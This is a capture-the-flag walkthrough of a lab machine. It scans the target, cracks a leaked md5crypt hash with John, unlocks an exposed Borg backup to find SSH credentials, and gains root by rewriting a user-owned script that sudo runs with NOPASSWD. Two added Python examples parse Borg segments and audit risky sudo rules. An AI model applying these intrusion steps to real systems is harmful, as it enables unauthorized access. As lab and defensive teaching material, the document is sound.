As per usual, I'm going to write down the easy stuff and omit the answers. However, I'm going to skip the first three questions and go directly for compromising the system. Oh, I forgot one thing, though: aside from the usual arsenal that Kali provides, we'll need to install something called 'borgbackup'. You'll understand why soon enough.
#1 What is the user.txt flag?
Okay, to begin, let's throw in the obligatory Nmap scan:
$ nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Okay, so we get ports 22 and 80 open. Let's ignore ssh for now and look at what port 80 is hiding... We bust out our beloved go/dirbuster and take a peek:
$ gobuster dir -u http://10.10.101.55/ -w /usr/share/wordlists/dirb/common.txt -x py,php
And we get...
[...]
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
Huh. /admin and /etc. Neat!
Okay, so... /admin reveals a simple blog page that, after a quick examination, doesn't reveal much of anything: just a simple page that's not powered by WordPress. Maybe a dead end? A closer look, however, gives us a link to archive.tar. Let's download it and see if we can use it.
$ wget <ip>/admin/archive.tar
and un-tar it with a quick 'tar -xf archive.tar', then look through the folders.
Looking closer at one of the numbered files gives us this:
home/field/dev/final_archive/data/0$ xxd -c8 1
00000000: 424f 5247 5f53 4547  BORG_SEG
00000008: 40f4 3c25 0900 0000  @.<%....
00000010: 02                   .
What the heck is a BORG_SEG file? A quick Google search reveals that it belongs to an archival tool named Borg. Okay. So, let's see what's in it!
home/field/dev/final_archive$ borg info --last 5 /home/by7e_/ctf/thm/cyborg/home/field/dev/final_archive/
Enter passphrase for key home/field/dev/final_archive:
Rats. We don't have a password.
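Before moving on, it's worth seeing what that numbered file actually is. The following is an added Python example, not part of the original walkthrough: it walks Borg's segment format (an 8-byte BORG_SEG magic followed by entries headed by crc32, size and tag, with PUT/DELETE entries carrying a 32-byte key) and runs it over the 17 bytes from the xxd dump above, which are embedded inline as constructed input. Useful when triaging what a leaked backup directory contains before any key or passphrase is in play.

```python
import struct
import zlib

# Borg 1.x segment layout (borg's repository.py): an 8-byte magic, then
# entries headed by <crc32 LE><size LE><tag>. size counts the whole entry
# including the 9-byte header; the crc32 covers everything after the crc
# field. PUT and DELETE entries carry a 32-byte object key after the tag.
MAGIC = b"BORG_SEG"
HEADER = struct.Struct("<IIB")
TAG_PUT, TAG_DELETE, TAG_COMMIT = 0, 1, 2
TAG_NAMES = {TAG_PUT: "PUT", TAG_DELETE: "DELETE", TAG_COMMIT: "COMMIT"}
KEY_LEN = 32

def parse_segment(data: bytes) -> list:
    """Walk one segment file and return its entries as dicts."""
    if data[:len(MAGIC)] != MAGIC:
        raise ValueError("not a Borg segment: bad magic")
    entries, offset = [], len(MAGIC)
    while offset < len(data):
        if len(data) - offset < HEADER.size:
            raise ValueError(f"truncated entry header at offset {offset}")
        crc, size, tag = HEADER.unpack_from(data, offset)
        if size < HEADER.size or offset + size > len(data):
            raise ValueError(f"bad entry size {size} at offset {offset}")
        covered = data[offset + 4:offset + size]   # crc is over size+tag+payload
        entry = {"offset": offset, "size": size,
                 "tag": TAG_NAMES.get(tag, f"UNKNOWN({tag})"),
                 "crc_ok": zlib.crc32(covered) == crc}
        payload = data[offset + HEADER.size:offset + size]
        if tag in (TAG_PUT, TAG_DELETE):            # key, then (for PUT) the object data
            entry["key"] = payload[:KEY_LEN].hex()
            entry["data_len"] = len(payload) - KEY_LEN
        entries.append(entry)
        offset += size
    return entries

def _entry(tag: int, payload: bytes = b"") -> bytes:
    """Build an entry the way borg does: crc32 over (size, tag, payload)."""
    no_crc = struct.pack("<IB", HEADER.size + len(payload), tag) + payload
    return struct.pack("<I", zlib.crc32(no_crc)) + no_crc

def make_commit() -> bytes:
    return _entry(TAG_COMMIT)

def make_put(key: bytes, data: bytes) -> bytes:
    return _entry(TAG_PUT, key + data)

# The 17 bytes from the xxd dump of segment file "1" above (constructed here).
SEGMENT_1 = bytes.fromhex("424f52475f534547" "40f43c2509000000" "02")
```

Running parse_segment(SEGMENT_1) shows that file "1" is nothing but a single COMMIT entry (size 9, tag 2): the repository's first, empty transaction, with the real object data living in the later segment files.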
We still have an undiscovered item on the site... Stuff that's dwelling in /etc. Let's look at that one...
Closer examination of the folder itself tells us it's a Squid (mis)configuration. We can find a passwd file in the folder, and it looks like it carries a hashed (shadow-style) password. Since we don't have the shadow counterpart, let's make a fake one!
$ echo "music_archive:x:1000:1000:music_archive,,,:/home/music_archive:/bin/bash" > passwd
$ echo "music_archive:[redacted]" > shadow
And with that...
$ unshadow passwd shadow > crackme.pwd
With that ready, we feed the file to our hungry John.
$ john crackme.pwd --wordlist=/path/to/your/rockyou/list
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
[redacted]       (music_archive)
Session completed
A quick test against the server's ssh tells us these are invalid credentials for it. But we have something else to use it against, right?
home/field/dev/final_archive$ borg info --last 5 home/field/dev/final_archive/
Enter passphrase for key home/field/dev/final_archive:
Archive name: music_archive
Archive fingerprint: f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82
Comment:
Hostname: ubuntu
Username: root
Time (start): Tue, 2020-12-29 15:00:38
Time (end): Tue, 2020-12-29 15:00:38
Duration: 0.14 seconds
Number of files: 97
Command line: ./borg create /home/field/dev/final_archive::music_archive /home/alex
Utilization of maximum supported archive size: 0%
------------------------------------------------------------------------------
                       Original size      Compressed size    Deduplicated size
This archive:                1.49 MB              1.49 MB              1.50 MB
All archives:                1.52 MB              1.50 MB              1.50 MB

                       Unique chunks         Total chunks
Chunk index:                      99                   99
Got em! Um... x2. Yeah! That's it!
$ borg extract home/field/dev/final_archive::music_archive
Enter passphrase for key home/field/dev/final_archive:
gives us... a lot more files to work with. Great. A quick find gives us a few interesting files to look at:
home/alex$ find .
[...]
./Documents
./Documents/note.txt
[...]
./Desktop
./Desktop/secret.txt
./.bashrc
./.bash_logout
./.profile
home/alex$ cat ./Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
home/alex$ cat ./Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:[expunged]
Nice. And a quick ssh with those credentials gives us access to the machine, and a
home/alex$ cat user.txt
Great! One down, one to go!
#2 What is the root.txt flag?
Hm... A quick ps -aux reveals nothing special. There's no service running that we could use to gain root. What about...
$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We check the ownership of the file with
alex@ubuntu:~$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30 01:48 /etc/mp3backups/backup.sh
Ha! We are the owner! This will be super easy! With a quick nano /etc/mp3backups/backup.sh we change the contents of the file to
#!/bin/bash
/bin/bash -c bash
exit
We save, and... Permission denied? What? The file is ours, but its mode (-r-xr-xr--) has no write bit set, so the editor can't save it. As the owner, though, we can change that:
$ chmod 777 /etc/mp3backups/backup.sh
We retry editing and run it, and -- we're root!
$ cat /root/root.txt
And that's it!
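The whole root path above boils down to one configuration mistake: a sudoers rule that hands out NOPASSWD on a script owned by the very user the rule applies to, so the owner can chmod and rewrite it. As an added example, not part of the original walkthrough, here is a small Python audit that parses `sudo -l` output for command rules and flags targets that a non-root user can tamper with; the sample input is constructed from the `sudo -l` and `ls -al` output shown above, and alex's uid of 1000 is an assumption.

```python
import re
import stat
from typing import NamedTuple

class SudoRule(NamedTuple):
    runas: str
    nopasswd: bool
    command: str

# Matches the rule lines of `sudo -l` output, e.g. "(ALL : ALL) NOPASSWD: /path".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

def parse_sudo_l(text: str) -> list:
    """Extract the command rules from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append(SudoRule(m.group("runas").strip(),
                                  "NOPASSWD:" in m.group("tags"), m.group("cmd")))
    return rules

def audit_target(rule: SudoRule, st_uid: int, st_mode: int, invoking_uid: int) -> list:
    """Reasons a sudo target can be rewritten by a non-root user. Takes the
    owner uid and permission bits as plain values so it runs on constructed
    data; on a real host feed it the fields of os.stat(rule.command)."""
    reasons = []
    if st_uid != 0:
        reasons.append(f"owned by uid {st_uid}, not root (the owner can chmod and edit it)")
    if st_uid == invoking_uid:
        reasons.append("owned by the very user the rule grants sudo to")
    if st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if reasons and rule.nopasswd:
        reasons.append("NOPASSWD: no password prompt stands in the way")
    return reasons

def audit_sudo_l(text: str, stats: dict, invoking_uid: int) -> dict:
    """Audit every rule; stats maps command path -> (owner uid, mode bits)."""
    return {r.command: audit_target(r, *stats[r.command], invoking_uid)
            for r in parse_sudo_l(text) if r.command in stats}

# Constructed from the `sudo -l` and `ls -al` output above; alex's uid of 1000 is assumed.
SUDO_L = """User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
"""
ALEX_UID = 1000
STATS = {"/etc/mp3backups/backup.sh": (ALEX_UID, 0o454)}   # alex:alex, -r-xr-xr--
```

The fix the audit points at is the usual one: sudo targets should be root-owned, not group- or world-writable, and live in a root-owned directory.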